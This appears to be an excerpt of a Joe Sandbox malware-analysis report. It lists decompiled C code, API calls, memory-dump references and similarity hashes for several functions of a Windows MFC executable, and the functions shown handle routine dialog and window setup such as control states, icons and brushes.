Part of subcall function 0041BEC8: #3092.MFC42(00000496,00000001,00000497,00000001,00000473,?,?,0041BC87,0000047C,0000047D,?,00000497,?,00000474,?,00000473), ref: 0041BEF9
Part of subcall function 0041BEC8: #2642.MFC42(00000496,00000001,00000497,00000001,00000473,?,?,0041BC87,0000047C,0000047D,?,00000497,?,00000474,?,00000473), ref: 0041BF00

Part of subcall function 0041BE71: #4055.MFC42(0000046A,?,0041BC8E,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470,?,0000046F,?), ref: 0041BE79
Part of subcall function 0041BE71: EnumChildWindows.USER32 ref: 0041BE87

Part of subcall function 0041BE8F: #4055.MFC42(00000470,?,?,0041BC95,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470,?,0000046F), ref: 0041BE98
Part of subcall function 0041BE8F: #4055.MFC42(0000046A,00000470,?,?,0041BC95,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470,?), ref: 0041BEA6
Part of subcall function 0041BE8F: #3092.MFC42(00000472,00000000,0000046A,00000470,?,?,0041BC95,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?), ref: 0041BEB9
Part of subcall function 0041BE8F: #2642.MFC42(00000472,00000000,0000046A,00000470,?,?,0041BC95,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?), ref: 0041BEC0

Part of subcall function 0040CF63: InvalidateRect.USER32(?,00000000,00000001), ref: 0040CF7B

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #1779$#4055$#2642#3092$#1783#4710ChildEnumInvalidateRectWindows
String ID:
API String ID: 2376213114-0
Opcode ID: f8115e8eb3e7628ca07abfe0e01b67bdfca0fd9ff5350f82b8b87f410a1ed920
Instruction ID: 5d9428708d7304940c2635c01393c5de37a50ceac507740f9118c605f217e1c7
Opcode Fuzzy Hash: f8115e8eb3e7628ca07abfe0e01b67bdfca0fd9ff5350f82b8b87f410a1ed920
Instruction Fuzzy Hash: 6031C5707447106FD615A776C852EFA76D9BB4DB04F0404BEFAC6CB3C2CA98AE0047A9

Uniqueness

Uniqueness Score: -1.00%

Function 0041903F, Relevance: 15.1, APIs: 10, Instructions: 84
windowCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0041903F(void* __ecx) {
				intOrPtr _t34;
				signed int _t38;
				void* _t42;
				void* _t57;

				_t57 = __ecx;
				L0043DF94();
				_push( *( *((intOrPtr*)(__ecx + 0x64)) + 0x124) & 0x000000ff);
				_push(0x4e25);
				L0043DF82();
				_push( *( *((intOrPtr*)(__ecx + 0x64)) + 0x129) & 0x000000ff);
				_push(0x8016);
				L0043DF82();
				_push( *( *((intOrPtr*)(__ecx + 0x64)) + 0x12a) & 0x000000ff);
				_push(0x8017);
				L0043DF82();
				_push( *( *((intOrPtr*)(__ecx + 0x64)) + 0x130) & 0x000000ff);
				_push(0x8018);
				L0043DF82();
				_push( *( *((intOrPtr*)(__ecx + 0x64)) + 0x12c) & 0x000000ff);
				_push(0x4e26);
				L0043DF82();
				_push( *( *((intOrPtr*)(__ecx + 0x64)) + 0x14c) & 0x000000ff);
				_push(0x801a);
				L0043DF82();
				_t54 = __ecx + 0xac;
				E0040CF63(__ecx + 0xac, 0x323232, 1);
				if(__ecx != 0) {
					_t34 =  *((intOrPtr*)(__ecx + 0x20));
				} else {
					_t34 = 0;
				}
				E0040CF2E(_t54, 1, 0x4550cc, 0, 0, 0, 0x5a2, _t34);
				_t38 =  *(_t57 + 0x68) >> 0x0000000f & 0x00000001;
				_push(_t38);
				_push(0x8019);
				L0043DF82();
				_push(0x442);
				L0043E066();
				SendMessageA( *(_t38 + 0x20), 0x401,  *(_t57 + 0x68) & 0xffff7fff, 0);
				 *((intOrPtr*)(_t57 + 0x1c0)) =  *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x64)) + 0x35c));
				_t42 = 1;
				return _t42;
			}

0x00419041
0x00419043
0x00419054
0x00419055
0x0041905a
0x0041906b
0x0041906c
0x00419071
0x00419082
0x00419083
0x00419088
0x00419099
0x0041909a
0x0041909f
0x004190b0
0x004190b1
0x004190b6
0x004190c7
0x004190c8
0x004190cd
0x004190d2
0x004190e1
0x004190e8
0x004190ee
0x004190ea
0x004190ea
0x004190ea
0x00419106
0x00419113
0x00419116
0x00419117
0x0041911c
0x00419124
0x00419131
0x00419141
0x00419152
0x00419158
0x0041915b

APIs

#4710.MFC42 ref: 00419043
#1779.MFC42(00004E25,?), ref: 0041905A
#1779.MFC42(00008016,?,00004E25,?), ref: 00419071
#1779.MFC42(00008017,?,00008016,?,00004E25,?), ref: 00419088
#1779.MFC42(00008018,?,00008017,?,00008016,?,00004E25,?), ref: 0041909F
#1779.MFC42(00004E26,?,00008018,?,00008017,?,00008016,?,00004E25,?), ref: 004190B6
#1779.MFC42(0000801A,?,00004E26,?,00008018,?,00008017,?,00008016,?,00004E25,?), ref: 004190CD

Part of subcall function 0040CF63: InvalidateRect.USER32(?,00000000,00000001), ref: 0040CF7B

#1779.MFC42(00008019,?,0000801A,?,00004E26,?,00008018,?,00008017,?,00008016,?,00004E25,?), ref: 0041911C
#3092.MFC42(00000442,00008019,?,0000801A,?,00004E26,?,00008018,?,00008017,?,00008016,?,00004E25,?), ref: 00419131
SendMessageA.USER32(?,00000401,?,00000000), ref: 00419141

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #1779$#3092#4710InvalidateMessageRectSend
String ID:
API String ID: 1704691092-0
Opcode ID: b0524498d10e1b9c774926ac50a36f07c8fadfef51fba5635e165ba53e2b3176
Instruction ID: 93440e7a2566d6434b83e793b248988a0494eceed0647d4c524d84c8b42cfcfd
Opcode Fuzzy Hash: b0524498d10e1b9c774926ac50a36f07c8fadfef51fba5635e165ba53e2b3176
Instruction Fuzzy Hash: 2421D3313407506FEA209765CC52FBA36D9BB4DB14F04046AFAC2DF3D2C9A4FA0097A5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D26E, Relevance: 15.1, APIs: 10, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040D26E(intOrPtr* __ecx, void* __eflags) {
				void* __esi;
				void* _t43;
				void* _t44;
				void* _t45;
				intOrPtr* _t48;
				intOrPtr* _t72;
				intOrPtr* _t75;
				void* _t77;

				E0043E4E0(0x43ff0b, _t77);
				_push(__ecx);
				_t75 = __ecx;
				_push( *((intOrPtr*)(_t77 + 8)));
				 *((intOrPtr*)(_t77 - 0x10)) = __ecx;
				_push(0x75);
				L0043E054();
				 *((intOrPtr*)(_t77 - 4)) = 0;
				E0040CE10(__ecx + 0x60, __eflags);
				 *((char*)(_t77 - 4)) = 1;
				_t43 = E0040CE10(__ecx + 0x174, __eflags);
				 *((char*)(_t77 - 4)) = 2;
				L0043DF64();
				 *((intOrPtr*)(__ecx + 0x288)) = 0x446660;
				 *((char*)(_t77 - 4)) = 3;
				_t44 = L00404F04(_t43, __ecx + 0x2c8, __ecx);
				 *((char*)(_t77 - 4)) = 4;
				_t45 = L00404F04(_t44, _t75 + 0x31c, _t75);
				 *((char*)(_t77 - 4)) = 5;
				L00404F04(_t45, _t75 + 0x370, _t75);
				 *((char*)(_t77 - 4)) = 6;
				E0040E07A(_t75 + 0x3c4);
				 *((char*)(_t77 - 4)) = 7;
				L0043DF64();
				 *((intOrPtr*)(_t75 + 0x434)) = 0x446a40;
				 *((char*)(_t77 - 4)) = 8;
				L0043E1EC();
				 *((char*)(_t77 - 4)) = 9;
				L0043DDD8();
				 *((char*)(_t77 - 4)) = 0xa;
				L0043DDD8();
				_t48 = _t75 + 0x4a8;
				 *_t48 = 0x446a2c;
				 *((intOrPtr*)(_t48 + 4)) = 0;
				 *((intOrPtr*)(_t48 + 8)) = 0x11;
				 *((intOrPtr*)(_t48 + 0xc)) = 0;
				 *((intOrPtr*)(_t48 + 0x10)) = 0;
				 *((intOrPtr*)(_t48 + 0x14)) = 0;
				 *((intOrPtr*)(_t48 + 0x18)) = 0xa;
				_t72 = _t75 + 0x4c4;
				 *((intOrPtr*)(_t72 + 4)) = 0;
				 *_t72 = 0x446a18;
				 *(_t75 + 0x488) =  *(_t75 + 0x488) | 0xffffffff;
				_push(0xffffffff);
				_push(0);
				 *((char*)(_t77 - 4)) = 0xd;
				 *_t75 = 0x446940;
				L0043E1E6();
				 *((intOrPtr*)(_t75 + 0x4a4)) = 0;
				_push(CreateSolidBrush(0xefefef));
				L0043DD60();
				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
				return _t75;
			}

0x0040d273
0x0040d278
0x0040d27c
0x0040d27e
0x0040d281
0x0040d284
0x0040d286
0x0040d290
0x0040d293
0x0040d29e
0x0040d2a2
0x0040d2ad
0x0040d2b3
0x0040d2b8
0x0040d2c4
0x0040d2c8
0x0040d2d3
0x0040d2d7
0x0040d2e2
0x0040d2e6
0x0040d2f1
0x0040d2f5
0x0040d300
0x0040d306
0x0040d30b
0x0040d317
0x0040d31b
0x0040d326
0x0040d32a
0x0040d335
0x0040d339
0x0040d33e
0x0040d344
0x0040d34a
0x0040d34d
0x0040d354
0x0040d357
0x0040d35a
0x0040d35d
0x0040d364
0x0040d36a
0x0040d36d
0x0040d373
0x0040d37a
0x0040d37c
0x0040d383
0x0040d387
0x0040d38d
0x0040d397
0x0040d3a3
0x0040d3a6
0x0040d3b3
0x0040d3bb

APIs

__EH_prolog.LIBCMT ref: 0040D273
#324.MFC42(00000075,?), ref: 0040D286

Part of subcall function 0040CE10: __EH_prolog.LIBCMT ref: 0040CE15

#567.MFC42(00000075,?), ref: 0040D2B3

Part of subcall function 0040E07A: __EH_prolog.LIBCMT ref: 0040E07F
Part of subcall function 0040E07A: #567.MFC42(?,?,0040D2FA), ref: 0040E08B
Part of subcall function 0040E07A: #540.MFC42(?,?,0040D2FA), ref: 0040E09D
Part of subcall function 0040E07A: #540.MFC42 ref: 0040E0C7
Part of subcall function 0040E07A: GetSysColor.USER32(0000000F), ref: 0040E0D4

#567.MFC42 ref: 0040D306
#500.MFC42 ref: 0040D31B
#540.MFC42 ref: 0040D32A
#540.MFC42 ref: 0040D339
#6142.MFC42(00000000,000000FF), ref: 0040D38D
CreateSolidBrush.GDI32(00EFEFEF), ref: 0040D39D
#1641.MFC42(00000000), ref: 0040D3A6

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #540$#567H_prolog$#1641#324#500#6142BrushColorCreateSolid
String ID:
API String ID: 927556981-0
Opcode ID: edc8c16fe86f3345d703983bcea4217b48ccae285efed037085683e0aa212f0e
Instruction ID: 2131c017913df267b86e7f1ce3b4eccc668aff03f2f718d2f0058d1ec14f5303
Opcode Fuzzy Hash: edc8c16fe86f3345d703983bcea4217b48ccae285efed037085683e0aa212f0e
Instruction Fuzzy Hash: 5231CEB0505740DED711EF65C585BDDFBE4AF59318F00859EE59A233C2CBB82608CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0041BCD0, Relevance: 15.1, APIs: 10, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0041BCD0(signed int __eax, void* __ecx) {
				signed int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				signed int _t55;
				signed int _t56;
				signed int _t60;
				signed int _t61;

				_push(1);
				L0043E08A();
				_push(0x46a);
				L0043DFA6();
				_push(0x46e);
				 *((char*)( *(__ecx + 0x60) + 0x360)) = __eax & 0xffffff00 | __eax != 0x00000000;
				_t50 =  *(__ecx + 0x60);
				 *((char*)(_t50 + 0x361)) = 1;
				L0043DFA6();
				_push(0x46d);
				_t51 = _t50 & 0xffffff00 | _t50 != 0x00000000;
				 *( *(__ecx + 0x60) + 0x365) = _t51;
				L0043DFA6();
				_push(0x46f);
				_t52 = _t51 & 0xffffff00 | _t51 != 0x00000000;
				 *( *(__ecx + 0x60) + 0x362) = _t52;
				L0043DFA6();
				_push(0x470);
				_t53 = _t52 & 0xffffff00 | _t52 != 0x00000000;
				 *( *(__ecx + 0x60) + 0x364) = _t53;
				L0043DFA6();
				_push(0x473);
				_t54 = _t53 & 0xffffff00 | _t53 != 0x00000000;
				 *( *(__ecx + 0x60) + 0x366) = _t54;
				L0043DFA6();
				_push(0x474);
				_t55 = _t54 & 0xffffff00 | _t54 != 0x00000000;
				 *( *(__ecx + 0x60) + 0x367) = _t55;
				L0043DFA6();
				_push(0x497);
				_t56 = _t55 & 0xffffff00 | _t55 != 0x00000000;
				 *( *(__ecx + 0x60) + 0x363) = _t56;
				L0043DFA6();
				_push(0x47c);
				 *((char*)( *(__ecx + 0x60) + 0x14f)) = _t56 & 0xffffff00 | _t56 != 0x00000000;
				 *((intOrPtr*)( *(__ecx + 0x60) + 0x66c)) =  *((intOrPtr*)(__ecx + 0x178));
				 *((intOrPtr*)( *(__ecx + 0x60) + 0x670)) =  *((intOrPtr*)(__ecx + 0x17c));
				_t60 =  *(__ecx + 0x60);
				 *((intOrPtr*)(_t60 + 0x674)) =  *((intOrPtr*)(__ecx + 0x180));
				L0043DFA6();
				_t61 = _t60 & 0xffffff00 | _t60 != 0x00000000;
				 *( *(__ecx + 0x60) + 0x140) = _t61;
				return _t61;
			}

0x0041bcd3
0x0041bcd5
0x0041bcda
0x0041bce1
0x0041bce9
0x0041bcf3
0x0041bcf9
0x0041bcfe
0x0041bd05
0x0041bd0d
0x0041bd14
0x0041bd17
0x0041bd1f
0x0041bd27
0x0041bd2e
0x0041bd31
0x0041bd39
0x0041bd41
0x0041bd48
0x0041bd4b
0x0041bd53
0x0041bd5b
0x0041bd62
0x0041bd65
0x0041bd6d
0x0041bd75
0x0041bd7c
0x0041bd7f
0x0041bd87
0x0041bd8f
0x0041bd96
0x0041bd99
0x0041bda1
0x0041bda9
0x0041bdb3
0x0041bdc2
0x0041bdd1
0x0041bdd7
0x0041bde0
0x0041bde8
0x0041bdf3
0x0041bdf6
0x0041bdfc

APIs

#6334.MFC42(00000001), ref: 0041BCD5
#4055.MFC42(0000046A,00000001), ref: 0041BCE1
#4055.MFC42 ref: 0041BD05
#4055.MFC42(0000046D), ref: 0041BD1F
#4055.MFC42(0000046F,0000046D), ref: 0041BD39
#4055.MFC42(00000470,0000046F,0000046D), ref: 0041BD53
#4055.MFC42(00000473,00000470,0000046F,0000046D), ref: 0041BD6D
#4055.MFC42(00000474,00000473,00000470,0000046F,0000046D), ref: 0041BD87
#4055.MFC42(00000497,00000474,00000473,00000470,0000046F,0000046D), ref: 0041BDA1
#4055.MFC42(0000047C,00000497,00000474,00000473,00000470,0000046F,0000046D), ref: 0041BDE8

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #4055$#6334
String ID:
API String ID: 810029699-0
Opcode ID: 0ebbaab8c8e84e9ccbda69de9f027e14ff70b5d8cd3daf76ef743f0e6687b9e9
Instruction ID: 2f81da32a200df75c6235946360b626305bd2896ebb1ccece7627e85b4128081
Opcode Fuzzy Hash: 0ebbaab8c8e84e9ccbda69de9f027e14ff70b5d8cd3daf76ef743f0e6687b9e9
Instruction Fuzzy Hash: 46319131309B40CFD315DB768552AEA36A66F99714F08406DE98B4B3C3DB16AA02CB49

Uniqueness

Uniqueness Score: -1.00%

Function 0041B23E, Relevance: 15.1, APIs: 10, Instructions: 65
windowCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E0041B23E(void* __ecx) {
				void* __esi;
				void* _t5;
				void* _t6;
				struct HINSTANCE__* _t7;
				struct HINSTANCE__* _t9;
				void* _t12;
				void* _t21;

				_t21 = __ecx;
				L0043DF94();
				_push(1);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(__ecx);
				_push(1);
				_t6 = L00404F47(_t5, __ecx + 0xbc, __ecx);
				_push(1);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(_t21);
				_push(2);
				_t7 = L00404F47(_t6, _t21 + 0x68, _t21);
				_push(0);
				_push(0x40000);
				_push(0);
				L0043E2F4();
				L0043E1C2();
				_push(0x80);
				_push(0xe);
				L0043DD78();
				_t9 = SendMessageA( *(_t21 + 0x20), 0x80, 0, LoadIconA(_t7, 0x80));
				L0043E1C2();
				_push(0x80);
				_push(0xe);
				L0043DD78();
				SendMessageA( *(_t21 + 0x20), 0x80, 1, LoadIconA(_t9, 0x80));
				_t12 = 1;
				return _t12;
			}

0x0041b242
0x0041b244
0x0041b24e
0x0041b255
0x0041b25b
0x0041b25c
0x0041b25d
0x0041b25e
0x0041b266
0x0041b26b
0x0041b26d
0x0041b26e
0x0041b26f
0x0041b270
0x0041b271
0x0041b276
0x0041b27f
0x0041b280
0x0041b285
0x0041b286
0x0041b28b
0x0041b295
0x0041b296
0x0041b299
0x0041b2b3
0x0041b2b5
0x0041b2ba
0x0041b2bb
0x0041b2be
0x0041b2cd
0x0041b2d1
0x0041b2d6

APIs

#4710.MFC42 ref: 0041B244
#4287.MFC42(00000000,00040000,00000000,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001), ref: 0041B286
#1168.MFC42(00000000,00040000,00000000,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001), ref: 0041B28B
#1146.MFC42(00000080,0000000E,00000080,00000000,00040000,00000000,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001), ref: 0041B299
LoadIconA.USER32(00000000,00000080), ref: 0041B2A5
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0041B2B3
#1168.MFC42(?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001), ref: 0041B2B5
#1146.MFC42(00000080,0000000E,00000080,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001), ref: 0041B2BE
LoadIconA.USER32(00000000,00000080), ref: 0041B2C4
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0041B2CD

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #1146#1168IconLoadMessageSend$#4287#4710
String ID:
API String ID: 890588306-0
Opcode ID: 4c22c99634d071bd2b96469c5cbb6071bf267ddeb5c90a36158af7cf03b00435
Instruction ID: 237f18c3cad0eea6a487e205c47f1463ac2bb804c5632c790e1461885e6a3942
Opcode Fuzzy Hash: 4c22c99634d071bd2b96469c5cbb6071bf267ddeb5c90a36158af7cf03b00435
Instruction Fuzzy Hash: A30175712417483BE53076639C86F6B7A6DDBC6B58F00042EB245661D28DAA7C40C278

Uniqueness

Uniqueness Score: -1.00%

Function 00419DC7, Relevance: 15.1, APIs: 10, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00419DC7(intOrPtr* __ecx) {
				void* __esi;
				void* _t28;
				void* _t29;
				void* _t30;
				intOrPtr* _t54;
				void* _t56;

				E0043E4E0(0x4412dd, _t56);
				_push(__ecx);
				_t54 = __ecx;
				_push( *((intOrPtr*)(_t56 + 8)));
				 *((intOrPtr*)(_t56 - 0x10)) = __ecx;
				_push(0xa9);
				L0043E054();
				 *(_t56 - 4) =  *(_t56 - 4) & 0x00000000;
				L0043DDD8();
				 *(_t56 - 4) = 1;
				L0043DDD8();
				 *(_t56 - 4) = 2;
				_t28 = E0040E07A(__ecx + 0x68);
				 *(_t56 - 4) = 3;
				L0043DDD8();
				 *(_t56 - 4) = 4;
				L0043DDD8();
				 *(_t56 - 4) = 5;
				L0043DDD8();
				 *(_t56 - 4) = 6;
				_t29 = L00404F04(_t28, __ecx + 0xe4, __ecx);
				 *(_t56 - 4) = 7;
				_t30 = L00404F04(_t29, _t54 + 0x138, _t54);
				 *(_t56 - 4) = 8;
				L00404F04(_t30, _t54 + 0x18c, _t54);
				_push(0x4550cc);
				 *(_t56 - 4) = 9;
				 *_t54 = 0x447d68;
				L0043DDD2();
				_push(0x4550cc);
				L0043DDD2();
				_push(0x4550cc);
				L0043DDD2();
				 *[fs:0x0] =  *((intOrPtr*)(_t56 - 0xc));
				return _t54;
			}

0x00419dcc
0x00419dd1
0x00419dd5
0x00419dd7
0x00419dda
0x00419ddd
0x00419de2
0x00419de7
0x00419dee
0x00419df6
0x00419dfa
0x00419e02
0x00419e06
0x00419e11
0x00419e17
0x00419e22
0x00419e26
0x00419e31
0x00419e35
0x00419e40
0x00419e44
0x00419e4f
0x00419e53
0x00419e5e
0x00419e62
0x00419e6e
0x00419e6f
0x00419e73
0x00419e79
0x00419e7e
0x00419e85
0x00419e8a
0x00419e91
0x00419e9e
0x00419ea6

APIs

__EH_prolog.LIBCMT ref: 00419DCC
#324.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419DE2
#540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419DEE
#540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419DFA

Part of subcall function 0040E07A: __EH_prolog.LIBCMT ref: 0040E07F
Part of subcall function 0040E07A: #567.MFC42(?,?,0040D2FA), ref: 0040E08B
Part of subcall function 0040E07A: #540.MFC42(?,?,0040D2FA), ref: 0040E09D
Part of subcall function 0040E07A: #540.MFC42 ref: 0040E0C7
Part of subcall function 0040E07A: GetSysColor.USER32(0000000F), ref: 0040E0D4

#540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419E17
#540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419E26
#540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419E35
#860.MFC42(004550CC,?,?,?,?,00419C38,00000000), ref: 00419E79
#860.MFC42(004550CC,004550CC,?,?,?,?,00419C38,00000000), ref: 00419E85
#860.MFC42(004550CC,004550CC,004550CC,?,?,?,?,00419C38,00000000), ref: 00419E91

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

